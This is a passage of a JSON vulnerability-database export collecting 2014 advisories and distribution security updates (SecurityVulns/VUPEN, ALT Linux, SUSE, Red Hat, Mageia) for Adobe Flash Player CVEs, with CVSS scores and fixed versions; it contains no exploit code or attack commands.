exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"MacOSX/Google Chrome/Installed\");\n\ngoogle_chrome_check_version(fix:'34.0.1847.131', severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "securityvulns": [{"lastseen": "2021-06-08T18:46:17", "description": "Use-after-free, buffer overflow, restrictions bypass, crossite scripting.", "cvss3": {}, "published": "2014-05-04T00:00:00", "type": "securityvulns", "title": "Adobe Flash Player multiple security vulnerabilities", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2014-0509", "CVE-2014-0492", "CVE-2014-0508", "CVE-2014-0503", "CVE-2014-0515", "CVE-2014-0498", "CVE-2014-0504", "CVE-2014-0507", "CVE-2014-0491", "CVE-2014-0497", "CVE-2014-0506", "CVE-2014-0502", "CVE-2014-0499"], "modified": "2014-05-04T00:00:00", "id": "SECURITYVULNS:VULN:13726", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13726", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:52", "description": "\r\n\r\nVUPEN Security Research - Adobe Flash ExternalInterface Use-After-Free\r\nCode Execution (Pwn2Own)\r\n\r\nWebsite : http://www.vupen.com\r\n\r\nTwitter : http://twitter.com/vupen\r\n\r\n\r\nI. BACKGROUND\r\n---------------------\r\n\r\nAdobe Flash Player is a cross-platform browser-based application runtime\r\nthat delivers viewing of expressive applications, content, and videos\r\nacross screens and browsers. It is installed on 98% of computers.\r\n\r\n\r\nII. DESCRIPTION\r\n---------------------\r\n\r\nVUPEN Vulnerability Research Team discovered a critical vulnerability\r\nin Adobe Flash.\r\n\r\nThe vulnerability is caused by a use-after-free error when interacting\r\nwith the "ExternalInterface" class from the browser, which could be\r\nexploited to achieve code execution via a malicious web page.\r\n\r\n\r\nIII. AFFECTED PRODUCTS\r\n---------------------------\r\n\r\nAdobe Flash versions prior to 13.0.0.182\r\n\r\n\r\nIV. SOLUTION\r\n----------------\r\n\r\nUpgrade to Adobe Flash v13.0.0.182.\r\n\r\n\r\nV. CREDIT\r\n--------------\r\n\r\nThis vulnerability was discovered by VUPEN Security.\r\n\r\n\r\nVI. ABOUT VUPEN Security\r\n---------------------------\r\n\r\nVUPEN is the leading provider of defensive and offensive cyber security\r\nintelligence and advanced zero-day research. All VUPEN's vulnerability\r\nintelligence results exclusively from its internal and in-house R&D\r\nefforts conducted by its team of world-class researchers.\r\n\r\nVUPEN Solutions: http://www.vupen.com/english/services/\r\n\r\n\r\nVII. REFERENCES\r\n----------------------\r\n\r\nhttp://helpx.adobe.com/security/products/flash-player/apsb14-09.html\r\nhttp://zerodayinitiative.com/advisories/ZDI-14-092/\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0506\r\n\r\n\r\nVIII. DISCLOSURE TIMELINE\r\n-----------------------------\r\n\r\n2014-01-28 - Vulnerability Discovered by VUPEN Security\r\n2014-03-13 - Vulnerability Reported to Adobe During Pwn2Own 2014\r\n2014-04-08 - Vulnerability Fixed by Adobe\r\n2014-04-14 - Public disclosure\r\n\r\n", "cvss3": {}, "published": "2014-05-04T00:00:00", "type": "securityvulns", "title": "VUPEN Security Research - Adobe Flash ExternalInterface Use-After-Free Code Execution (Pwn2Own)", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2014-0506"], "modified": "2014-05-04T00:00:00", "id": "SECURITYVULNS:DOC:30594", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30594", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "altlinux": [{"lastseen": "2022-06-10T03:07:05", "description": "3:11-alt28 built April 15, 2014 Sergey V Turchin in task [#118324](<https://git.altlinux.org/tasks/118324/>) \n--- \nApril 15, 2014 Sergey V Turchin \n \n \n - new version\n - security fixes:\n CVE-2014-0506, CVE-2014-0507, CVE-2014-0508, CVE-2014-0509\n", "cvss3": {}, "published": "2014-04-15T00:00:00", "type": "altlinux", "title": "Security fix for the ALT Linux 7 package adobe-flash-player version 3:11-alt28", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0506", "CVE-2014-0507", "CVE-2014-0508", "CVE-2014-0509"], "modified": "2014-04-15T00:00:00", "id": "C1698F34A394319E0076F3F1117FE11F", "href": "https://packages.altlinux.org/en/p7/srpms/adobe-flash-player/1707551309196135328", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-10T03:07:30", "description": "3:11-alt28 built April 15, 2014 Sergey V Turchin in task [#118325](<https://git.altlinux.org/tasks/118325/>) \n--- \nApril 15, 2014 Sergey V Turchin \n \n \n - new version\n - security fixes:\n CVE-2014-0506, CVE-2014-0507, CVE-2014-0508, CVE-2014-0509\n", "cvss3": {}, "published": "2014-04-15T00:00:00", "type": "altlinux", "title": "Security fix for the ALT Linux 6 package adobe-flash-player version 3:11-alt28", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0506", "CVE-2014-0507", "CVE-2014-0508", "CVE-2014-0509"], "modified": "2014-04-15T00:00:00", "id": "698F04960C6FDCECD3FAF3107FEF2E6C", "href": "https://packages.altlinux.org/en/p6/srpms/adobe-flash-player/1707551309196135328", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-10T03:07:06", "description": "3:11-alt27 built March 13, 2014 Sergey V Turchin in task [#116325](<https://git.altlinux.org/tasks/116325/>) \n--- \nMarch 13, 2014 Sergey V Turchin \n \n \n - new version\n - security fixes: CVE-2014-0503, CVE-2014-0504\n", "cvss3": {}, "published": "2014-03-13T00:00:00", "type": "altlinux", "title": "Security fix for the ALT Linux 7 package adobe-flash-player version 3:11-alt27", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0503", "CVE-2014-0504"], "modified": "2014-03-13T00:00:00", "id": "985F12E046E3CBC5A14C9DCABE931222", "href": "https://packages.altlinux.org/en/p7/srpms/adobe-flash-player/1695284624141279036", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2022-06-10T03:07:31", "description": "3:11-alt27 built March 13, 2014 Sergey V Turchin in task [#116326](<https://git.altlinux.org/tasks/116326/>) \n--- \nMarch 13, 2014 Sergey V Turchin \n \n \n - new version\n - security fixes: CVE-2014-0503, CVE-2014-0504\n", "cvss3": {}, "published": "2014-03-13T00:00:00", "type": "altlinux", "title": "Security fix for the ALT Linux 6 package adobe-flash-player version 3:11-alt27", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0503", "CVE-2014-0504"], "modified": "2014-03-13T00:00:00", "id": "BAED9BAFC78A2114C200DC6B81159C80", "href": "https://packages.altlinux.org/en/p6/srpms/adobe-flash-player/1695284624141279036", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2022-06-10T03:07:29", "description": "3:11-alt29 built April 29, 2014 Sergey V Turchin in task [#118985](<https://git.altlinux.org/tasks/118985/>) \n--- \nApril 29, 2014 Sergey V Turchin \n \n \n - new version\n - security fixes: CVE-2014-0515\n", "cvss3": {}, "published": "2014-04-29T00:00:00", "type": "altlinux", "title": "Security fix for the ALT Linux 6 package adobe-flash-player version 3:11-alt29", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0515"], "modified": "2014-04-29T00:00:00", "id": "55FA88D25AACA760803996FE8A2C7905", "href": "https://packages.altlinux.org/en/p6/srpms/adobe-flash-player/1712802361818962663", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-10T03:07:05", "description": "3:11-alt29 built April 29, 2014 Sergey V Turchin in task [#118984](<https://git.altlinux.org/tasks/118984/>) \n--- \nApril 29, 2014 Sergey V Turchin \n \n \n - new version\n - security fixes: CVE-2014-0515\n", "cvss3": {}, "published": "2014-04-29T00:00:00", "type": "altlinux", "title": "Security fix for the ALT Linux 7 package adobe-flash-player version 3:11-alt29", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0515"], "modified": "2014-04-29T00:00:00", "id": "AE49719E4DEE478C3CB94C7C7539230B", "href": "https://packages.altlinux.org/en/p7/srpms/adobe-flash-player/1712802361818962663", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2016-09-04T11:40:21", "description": "Adobe flash-player has been updated to version 11.2.202.350\n to resolve security issues and bugs. More information can\n be found at\n\n <a rel=\"nofollow\" href=\"http://helpx.adobe.com/security/products/flash-player/apsb14\">http://helpx.adobe.com/security/products/flash-player/apsb14</a>\n -09.html\n <<a rel=\"nofollow\" href=\"http://helpx.adobe.com/security/products/flash-player/apsb1\">http://helpx.adobe.com/security/products/flash-player/apsb1</a>\n 4-09.html>\n\n The following security issues have been fixed:\n\n * a use-after-free vulnerability that could have\n resulted in arbitrary code execution (CVE-2014-0506).\n * a buffer overflow vulnerability that could have\n resulted in arbitrary code execution (CVE-2014-0507).\n * a security bypass vulnerability that could have lead\n to information disclosure (CVE-2014-0508).\n * a cross-site-scripting vulnerability (CVE-2014-0509).\n", "cvss3": {}, "published": "2014-04-16T19:04:49", "type": "suse", "title": "Security update for flash-player (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2014-0509", "CVE-2014-0508", "CVE-2014-0507", "CVE-2014-0506"], "modified": "2014-04-16T19:04:49", "id": "SUSE-SU-2014:0535-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-04/msg00012.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:22:34", "description": "This update of Adobe Flash Player fixes the following\n issues:\n\n * A stack overflow vulnerability that could have\n resulted in arbitrary code execution. (CVE-2014-0498)\n * A memory leak vulnerability that could have been used\n to defeat memory address layout randomization.\n (CVE-2014-0499)\n * A double free vulnerability that could have resulted\n in arbitrary code execution. (CVE-2014-0502)\n", "cvss3": {}, "published": "2014-02-25T20:04:15", "type": "suse", "title": "Security update for flash-player (critical)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2014-0498", "CVE-2014-0502", "CVE-2014-0499"], "modified": "2014-02-25T20:04:15", "id": "SUSE-SU-2014:0290-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-02/msg00017.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:22:34", "description": "Adobe Flash Player was updated to 11.2.202.341: (bnc#865021)\n * APSB14-07, CVE-2014-0498 CVE-2014-0499 CVE-2014-0502\n - Contents of flashplayer_11_sa.i386.tar.gz changed back:\n spec file updated, supplementary script (update.sh)\n updated.\n\n", "cvss3": {}, "published": "2014-02-24T08:04:11", "type": "suse", "title": "flash-player: update to 11.2.202.341 security release (critical)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2014-0498", "CVE-2014-0502", "CVE-2014-0499"], "modified": "2014-02-24T08:04:11", "id": "OPENSUSE-SU-2014:0277-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-02/msg00014.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:40:17", "description": "Adobe Flash Player was updated to 11.2.202.341: (bnc#865021)\n * APSB14-07, CVE-2014-0498 CVE-2014-0499 CVE-2014-0502\n - Contents of flashplayer_11_sa.i386.tar.gz changed back:\n spec file updated, supplementary script (update.sh)\n updated.\n\n", "cvss3": {}, "published": "2014-02-24T11:04:11", "type": "suse", "title": "flash-player: update to 11.2.202.341 security release (critical)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2014-0498", "CVE-2014-0502", "CVE-2014-0499"], "modified": "2014-02-24T11:04:11", "id": "OPENSUSE-SU-2014:0278-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-02/msg00015.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:45:49", "description": "Adobe Flash Player was updated to version 11.2.202.346 to\n fix security issues:\n\n * CVE-2014-0503: A vulnerability that could be used to\n bypass the same origin policy was fixed.\n * CVE-2014-0504: A vulnerability that could be used to\n read the contents of the clipboard was fixed.\n\n More information can be found on:\n <a rel=\"nofollow\" href=\"http://helpx.adobe.com/security/products/flash-player/apsb14\">http://helpx.adobe.com/security/products/flash-player/apsb14</a>\n -08.html\n <<a rel=\"nofollow\" href=\"http://helpx.adobe.com/security/products/flash-player/apsb1\">http://helpx.adobe.com/security/products/flash-player/apsb1</a>\n 4-08.html>\n\n Security Issues references:\n\n * CVE-2014-0503\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0503\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0503</a>\n >\n * CVE-2014-0504\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0504\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0504</a>\n >\n\n", "cvss3": {}, "published": "2014-03-18T00:04:14", "type": "suse", "title": "Security update for flash-player (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2014-0503", "CVE-2014-0504"], "modified": "2014-03-18T00:04:14", "id": "SUSE-SU-2014:0387-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-03/msg00014.html", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2016-09-04T12:35:28", "description": "Adobe Flash Player was updated to version 11.2.202.346 to\n fix security issues:\n\n CVE-2014-0503: A vulnerability that could be used to bypass\n the same origin policy was fixed.\n\n CVE-2014-0504: A vulnerability that could be used to read\n the contents of the clipboard was fixed.\n\n More information can be found on:\n <a rel=\"nofollow\" href=\"http://helpx.adobe.com/security/products/flash-player/apsb14\">http://helpx.adobe.com/security/products/flash-player/apsb14</a>\n -08.html\n\n", "cvss3": {}, "published": "2014-03-15T10:04:12", "type": "suse", "title": "flash-player to 11.2.202.346 (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2014-0503", "CVE-2014-0504"], "modified": "2014-03-15T10:04:12", "id": "OPENSUSE-SU-2014:0379-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-03/msg00013.html", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2016-09-04T12:36:41", "description": "Adobe Flash Player was updated to version 11.2.202.346 to\n fix security issues:\n\n CVE-2014-0503: A vulnerability that could be used to bypass\n the same origin policy was fixed.\n\n CVE-2014-0504: A vulnerability that could be used to read\n the contents of the clipboard was fixed.\n\n More information can be found on:\n <a rel=\"nofollow\" href=\"http://helpx.adobe.com/security/products/flash-player/apsb14\">http://helpx.adobe.com/security/products/flash-player/apsb14</a>\n -08.html\n\n", "cvss3": {}, "published": "2014-03-14T21:04:13", "type": "suse", "title": "flash-player to 11.2.202.346 (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2014-0503", "CVE-2014-0504", "CVE-2013-0504"], "modified": "2014-03-14T21:04:13", "id": "OPENSUSE-SU-2014:0377-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-03/msg00012.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:31:33", "description": "This flash-player update to version 11.2.202.356 fixes the\n following critical security issue:\n\n * bnc#875577: buffer overflow vulnerability that leads\n to arbitrary code execution (CVE-2014-0515)\n\n Adobe Security Bulletin (APSB14-13)\n <a rel=\"nofollow\" href=\"http://helpx.adobe.com/security/products/flash-player/apsb14\">http://helpx.adobe.com/security/products/flash-player/apsb14</a>\n -13.html\n <<a rel=\"nofollow\" href=\"http://helpx.adobe.com/security/products/flash-player/apsb1\">http://helpx.adobe.com/security/products/flash-player/apsb1</a>\n 4-13.html>\n", "cvss3": {}, "published": "2014-05-03T01:04:15", "type": "suse", "title": "Security update for flash-player (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2014-0515"], "modified": "2014-05-03T01:04:15", "id": "SUSE-SU-2014:0605-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-05/msg00001.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:22:47", "description": "This flash-player update fixes a critical buffer overflow\n vulnerability that leads to arbitrary code execution.\n\n The flash-player package was updated to version\n 11.2.202.356.\n * bnc#875577, APSB14-13, CVE-2014-0515\n\n", "cvss3": {}, "published": "2014-04-30T10:05:37", "type": "suse", "title": "update for flash-player (critical)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2014-0515"], "modified": "2014-04-30T10:05:37", "id": "OPENSUSE-SU-2014:0585-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-04/msg00017.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:22:35", "description": "This flash-player update fixes a critical buffer overflow\n vulnerability that leads to arbitrary code execution.\n\n The flash-player package was updated to version\n 11.2.202.356.\n * bnc#875577, APSB14-13, CVE-2014-0515\n\n", "cvss3": {}, "published": "2014-05-01T21:04:13", "type": "suse", "title": "update for flash-player (critical)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2014-0515"], "modified": "2014-05-01T21:04:13", "id": "OPENSUSE-SU-2014:0589-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-05/msg00000.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2023-05-26T10:21:36", "description": "The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash\nPlayer web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player. These\nvulnerabilities are detailed in the Adobe Security Bulletin APSB14-09,\nlisted in the References section.\n\nTwo flaws were found in the way flash-plugin displayed certain SWF content.\nAn attacker could use these flaws to create a specially crafted SWF file\nthat would cause flash-plugin to crash or, potentially, execute arbitrary\ncode when the victim loaded a page containing the malicious SWF content.\n(CVE-2014-0506, CVE-2014-0507)\n\nA flaw in flash-plugin could allow an attacker to obtain sensitive\ninformation if a victim were tricked into visiting a specially crafted web\npage. (CVE-2014-0508)\n\nA flaw in flash-plugin could allow an attacker to conduct cross-site\nscripting (XSS) attacks if a victim were tricked into visiting a specially\ncrafted web page. (CVE-2014-0509)\n\nAll users of Adobe Flash Player should install this updated package, which\nupgrades Flash Player to version 11.2.202.350.\n", "cvss3": {}, "published": "2014-04-09T00:00:00", "type": "redhat", "title": "(RHSA-2014:0380) Critical: flash-plugin security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0506", "CVE-2014-0507", "CVE-2014-0508", "CVE-2014-0509"], "modified": "2018-06-07T05:04:28", "id": "RHSA-2014:0380", "href": "https://access.redhat.com/errata/RHSA-2014:0380", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-26T10:21:36", "description": "The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash\nPlayer web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player. These\nvulnerabilities are detailed in the Adobe Security bulletin APSB14-07,\nlisted in the References section. Specially-crafted SWF content could\ncause flash-plugin to crash or, potentially, execute arbitrary code when a\nvictim loads a page containing the malicious SWF content. (CVE-2014-0498,\nCVE-2014-0499, CVE-2014-0502)\n\nAll users of Adobe Flash Player should install this updated package, which\nupgrades Flash Player to version 11.2.202.341.\n", "cvss3": {}, "published": "2014-02-21T00:00:00", "type": "redhat", "title": "(RHSA-2014:0196) Critical: flash-plugin security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0498", "CVE-2014-0499", "CVE-2014-0502"], "modified": "2018-06-07T05:04:37", "id": "RHSA-2014:0196", "href": "https://access.redhat.com/errata/RHSA-2014:0196", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-26T10:21:36", "description": "The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash\nPlayer web browser plug-in.\n\nThis update fixes two vulnerabilities in Adobe Flash Player. These\nvulnerabilities are detailed in the Adobe Security bulletin APSB14-08,\nlisted in the References section.\n\nA vulnerability was reported that could be used to bypass the same origin\npolicy. (CVE-2014-0503)\n\nA vulnerability was reported that could be used to read the contents of the\nclipboard. (CVE-2014-0504)\n\nAll users of Adobe Flash Player should install this updated package, which\nupgrades Flash Player to version 11.2.202.346.\n", "cvss3": {}, "published": "2014-03-12T00:00:00", "type": "redhat", "title": "(RHSA-2014:0289) Moderate: flash-plugin security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0503", "CVE-2014-0504"], "modified": "2018-06-07T05:04:11", "id": "RHSA-2014:0289", "href": "https://access.redhat.com/errata/RHSA-2014:0289", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2023-05-26T10:21:36", "description": "The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash\nPlayer web browser plug-in.\n\nThis update fixes one vulnerability in Adobe Flash Player. This\nvulnerability is detailed in the Adobe Security Bulletin APSB14-13, listed\nin the References section.\n\nA flaw was found in the way flash-plugin displayed certain SWF content. An\nattacker could use this flaw to create a specially crafted SWF file that\nwould cause flash-plugin to crash or, potentially, execute arbitrary code\nwhen the victim loaded a page containing the malicious SWF content.\n(CVE-2014-0515)\n\nAll users of Adobe Flash Player should install this updated package, which\nupgrades Flash Player to version 11.2.202.356.\n", "cvss3": {}, "published": "2014-04-29T00:00:00", "type": "redhat", "title": "(RHSA-2014:0447) Critical: flash-plugin security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0515"], "modified": "2018-06-07T05:04:18", "id": "RHSA-2014:0447", "href": "https://access.redhat.com/errata/RHSA-2014:0447", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mageia": [{"lastseen": "2023-09-20T15:33:34", "description": "Adobe Flash Player 11.2.202.350 contains fixes to critical security vulnerabilities found in earlier versions that could cause a crash and potentially allow an attacker to remotely take control of the affected system. This update resolves a use-after-free vulnerability that could result in arbitrary code execution (CVE-2014-0506). This update resolves a buffer overflow vulnerability that could result in arbitrary code execution (CVE-2014-0507). This update resolves a security bypass vulnerability that could lead to information disclosure (CVE-2014-0508). This update resolves a cross-site-scripting vulnerability (CVE-2014-0509). \n", "cvss3": {}, "published": "2014-04-09T15:40:40", "type": "mageia", "title": "Updated flash-player-plugin package fixes multiple vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0506", "CVE-2014-0507", "CVE-2014-0508", "CVE-2014-0509"], "modified": "2014-04-09T15:40:40", "id": "MGASA-2014-0169", "href": "https://advisories.mageia.org/MGASA-2014-0169.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-20T15:33:34", "description": "Adobe Flash Player 11.2.202.341 contains fixes to critical security vulnerabilities found in 